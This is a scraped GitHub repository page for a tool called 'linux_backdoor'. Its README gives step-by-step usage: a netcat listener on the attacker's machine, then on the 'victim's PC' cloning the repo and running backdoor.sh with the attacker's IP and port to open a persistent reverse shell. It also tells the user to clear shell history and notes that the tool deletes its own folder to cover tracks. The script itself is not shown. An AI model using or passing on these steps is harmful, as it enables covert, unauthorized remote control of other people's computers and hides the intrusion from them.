Skip to content

KingstonCyberSec/linux_backdoor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

28 Commits
 
 
 
 

Repository files navigation

linux_backdoor

toy-train-removebg-preview

Usage :

~ Attacker's PC ~

$ nc -lvnp 443

~ Victim's PC ~

$ git clone https://github.com/KingstonCyberSec/linux_backdoor.git

$ cd linux_backdoor

$ chmod +x *

$ bash backdoor.sh (Attacker IP) (Port)

Images :

github

Clearing Tracks :

~ Victim's PC ~

$ history -c

Note :

================================================================================================================= | You have to keep netcat listner(nc -lvnp 443) started whenever the victim's PC is on so you will get access |

===================================================================================================================
| Once the backdoor is injected, it will automatically delete the linux_backdoor directory from the victim's PC. |

About

~ Advanced Linux Backdoor ~

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages